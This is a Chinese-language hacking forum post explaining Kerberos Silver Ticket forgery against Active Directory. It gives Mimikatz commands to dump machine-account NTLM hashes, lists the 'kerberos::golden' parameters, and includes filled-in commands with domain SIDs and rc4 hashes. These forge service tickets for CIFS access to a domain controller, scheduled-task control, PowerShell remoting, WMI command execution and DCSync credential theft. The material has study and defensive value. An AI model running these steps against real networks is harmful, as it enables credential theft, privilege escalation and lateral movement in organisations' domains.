taibeihacker
Moderator
0x01白银票据(Silver Tickets)定义
白銀票據(Silver Tickets)是偽造Kerberos票證授予服務(TGS)的票也稱為服務票據。如下圖所示,與域控制器沒有AS-REQ 和AS-REP(步驟1和2),也沒有TGS-REQ/TGS-REP(步驟3和4)通信。由於銀票是偽造的TGS,所以沒有與域控制器通信。
0x02白银票据的特点
1.白銀票據是一個有效的票據授予服務(TGS)Kerberos票據,因為Kerberos驗證服務運行的每台服務器都對服務主體名稱的服務帳戶進行加密和簽名。2.黃金票據是偽造TGT並且有效的獲得任何Kerberos服務,而白銀票據是偽造TGS。這意味著白銀票據僅限於特定服務器上的任何服務。
3.大多數服務不驗證PAC(通過將PAC校驗和發送到域控制器進行PAC驗證),因此使用服務帳戶密碼哈希生成的有效TGS可以完全偽造PAC
4.攻擊者需要服務帳戶密碼哈希值
5.TGS是偽造的,所以沒有和TGT通信,意味著DC從驗證過。
6.任何事件日誌都在目標服務器上。
0x03创建白银票据
為了創建或偽造白銀票據,攻擊者必須獲得目標服務賬號的密碼hash值。如果目標服務正在使用中的帳戶(如MS SQL)下運行,則需要服務帳戶密碼哈希以創建銀票。使用Kerberoast(https://github.com/nidem/kerberoast...務,因此創建白銀票據所需的密碼數據是關聯的計算機帳戶的密碼哈希值。當計算機加入Active Directory時,會創建一個新的計算機帳戶對象並將其添加到計算機中。密碼和相關的散列哈希存儲在擁有該帳戶的計算機上,並且將NTLM密碼散列存儲在域的域控制器上的Active Directory數據庫中。如果攻擊者可以獲得對計算機的管理權限或者能夠以本地系統的身份運行代碼,則攻擊者可以使用Mimikatz從系統中轉儲AD計算機帳戶密碼哈希(NTLM密碼哈希用於加密RC4 Kerberos門票):Mimikatz “privilege:debug” “sekurlsa:logonpasswords” exit #需要管理員權限
0x04 Mimikatz白银票据票命令
/domain–完整的域名稱,如:lab.adsecurity.org/sid–域的SID,如:S-1-5-21-1473643419-774954089-2222329127
/user– 域用戶名
/groups(可選) - 用戶所屬的組RID
/ticket(可選) - 提供一個路徑和名稱,用於保存Golden Ticket文件以便日後使用,或者使用/ptt立即將黃金票據插入到內存中以供使用
/ptt- 作為/ticket的替代品,使用它來立即將偽造的票據插入到內存中以供使用。
/id(可選) - 用戶RID,Mimikatz默認值是500(默認管理員帳戶RID)
/startoffset(可選) - 票證可用時的起始偏移(如果使用此選項,通常設置為-10或0)Mimikatz默認值是0
/endin(可選) - 票據有效時間,Mimikatz默認值是10年,Active Directory默認Kerberos策略設置為10小時
/renewmax(可選) - 續訂最長票據有效時間,Mimikatz默認值是10年,Active Directory默認Kerberos策略設置為最長為7天
1.白银票据需要的参数
/target–目標服務器的FQDNFQDN:(Fully Qualified Domain Name)全限定域名:同時帶有主機名和域名的名稱。 (通過符號“.”)
/service–運行在目標服務器上的kerberos服務,該服務主體名稱類型如cifs,http,mssql等
/rc4–服務的NTLM散列(計算機帳戶或用戶帳戶)
2.白银票据默认组
域用戶SID:S-1-5-21 DOMAINID -513域管理員SID:S-1-5-21 DOMAINID -512
架構管理員SID:S-1-5-21 DOMAINID -518
企業管理員SID:S-1-5-21 DOMAINID -519
組策略創建所有者SID:S-1-5-21 DOMAINID -520
3. Mimikatz命令创建白银票据
以下Mimikatz命令會在服務器adsmswin2k8r2.lab.adsecurity.org上為CIFS服務創建白銀票據。為了成功創建Silver Ticket,需要從AD域轉儲中或在本地系統上運行Mimikatz來獲獲取adsmswin2k8r2.lab.adsecurity.org中AD計算機帳戶密碼哈希值。 NTLM密碼哈希與rc4參數一起使用。服務SPN類型也需要在/service參數中標識。目標計算機的FQDA需要在/target參數中使用以及/sid參數中的域SID。命令如下:mimikatz “kerberos:golden /user:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit
0x05 白银票据在各种服务中的实列
1.白银票据的服务列表
Service TypeService Silver Tickets
WMI
HOST
RPCSS
PowerShell
Remoting
HOST
HTTP
WinRM
HOST
HTTP
Scheduled
Tasks
HOST
Windows
File Share (CIFS)
CIFS
LDAP
operations including
Mimikatz DCSync
LDAP
Windows
Remote Server Administration Tools
RPCSS
LDAP
CIFS
2.Windows共享(CIFS)管理访问的银票
為“cifs”服務創建白銀票據,以獲得目標計算機上任何Windows共享的管理權限。注入CIFS Silver Ticket後,我們現在可以訪問目標計算機上的任何共享,包括
c $共享,我們能夠將文件拷貝到共享文件中。
3.具有管理员权限的Windows计算机(HOST)白银票据
創建銀票以獲得目標計算機上所涵蓋的任何Windows服務的管理員權限。這包括修改和創建計劃任務的權限。
利用HOST Silver Ticket,我們可以創建一個新的計劃任務。
或者通過利用HOST Silver Ticket,我們可以修改存在的計劃任務。
4.Silver Ticket连接到以Windows管理员权限计算机上的PowerShell远程执行
為“http”服務和“wsman”服務創建Silver Ticket,以獲得目標系統上的WinRM和或PowerShell Remoting的管理權限。
注入兩張HTTP&WSMAN白銀票據後,我們可以使用PowerShell遠程(或WinRM的)反彈出目標系統shell。首先New-PSSession使用PowerShell創建到遠程系統的會話的PowerShell cmdlet,然後Enter-PSSession打開遠程shell。
5.白银票据证连接到具有管理员权限Windows计算机上的LDAP
為“ldap”服務創建Silver Ticket以獲得目標系統(包括ActiveDirectory)上LDAP服務的管理權限。
利用LDAP Silver Ticket,我們可以遠程訪問LDAP服務來獲得krbtgt的信息
注:lsadump:dcsync
向DC 發起一個同步對象(可獲取帳戶的密碼信息)的質詢。需要的權限包括管理員組(Administrators),域管理員組( Domain Admins)或企業管理員組(Enterprise Admins)以及域控制器的計算機帳戶,只讀域控制器默認不允許讀取用戶密碼數據。
6.白银票据证连接到具有管理员权限Windows计算机上的WMI
為“HOST”服務和“rpcss”服務創建白銀票據,以使用WMI在目標系統上遠程執行命令。
注入這些白銀票據之後,我們可以通過運行“klist”來確認Kerberos TGS票據在內存中註入白銀票據後,我們可以通過“傳票”來調用WMIC或Invoke-WmiMethod在目標系統上運行命令。
Invoke-WmiMethod win32_process -ComputerName $ Computer
-Credential $ Creds -name create -argumentlist“$ RunCommand”
7.访问域控上“cifs”服务实列
首先需要獲得如下信息:/domain
/sid
/target:目標服務器的域名全稱,此處為域控的全稱
/service:目標服務器上面的kerberos服務,此處為cifs
/rc4:計算機賬戶的NTLM hash,域控主機的計算機賬戶
/user:要偽造的用戶名,此處可用silver測試
在域控上執行如下命令來獲取域控主機的本地管理員賬戶hash
mimikatz log
'sekurlsa:logonpasswords'
如圖:
注:
此處要找到計算機賬戶,也就是Username : WIN-8VVLRPIAJB0$的NTLM hash,如果是其他賬戶,那麼會失敗,也就是需要共享服務賬號。
整理以上獲得的信息如下:
/domain:test.local
/sid:S-1-5-21-4155807533-921486164-2767329826
/target:WIN-8VVLRPIAJB0.test.local
/service:cifs
/rc4:d5304f9ea69523479560ca4ebb5a2155
/user:silver
使用mimikatz執行如下命令導入Silver Ticket
mimikatz
'kerberos:golden /domain:test.local
/sid:S-1-5-21-4155807533-921486164-2767329826
/target:WIN-8VVLRPIAJB0.test.local /service:cifs
/rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt'
如圖,成功導入,此時可以成功訪問域控上的文件共享
